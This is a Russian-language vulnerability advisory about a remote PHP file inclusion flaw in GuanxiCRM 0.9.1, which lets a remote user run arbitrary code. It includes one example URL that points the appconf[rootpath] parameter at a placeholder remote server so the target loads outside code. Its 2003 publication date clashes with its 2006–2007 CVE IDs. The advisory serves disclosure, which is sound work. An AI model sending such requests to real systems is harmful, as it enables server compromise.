Выполнение произвольных команд в GuanxiCRM

Дата публикации:
25.07.2003
Дата изменения:
09.11.2012
Всего просмотров:
904
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-4898
CVE-2007-5096
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
guanxiCRM 0.x
Описание: Уязвимость обнаружена в GuanxiCRM. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.

Несколько сценариев (parser.php, dom.php, imap.php, rfc822.php, fetchmail.php, maillist.php, operations.php, class.html.mime.mail.class, и settings.php) не в состоянии правильно проверить переменные, определенные пользователем. Удаленный пользователь может определить удаленное местоположение для нескольких PHP файлов, которые будут выполнены на целевом сервере. Пример:

http://[target]/[guanxicrm dir]/include/phpxd/include/dom.php?appconf[rootpath]=http://[remote server]

Уязвимость обнаружена в GuanxiCRM 0.9.1

Ссылки: GuanxiCRM Remote Include Vulnderability

или введите имя

CAPTCHA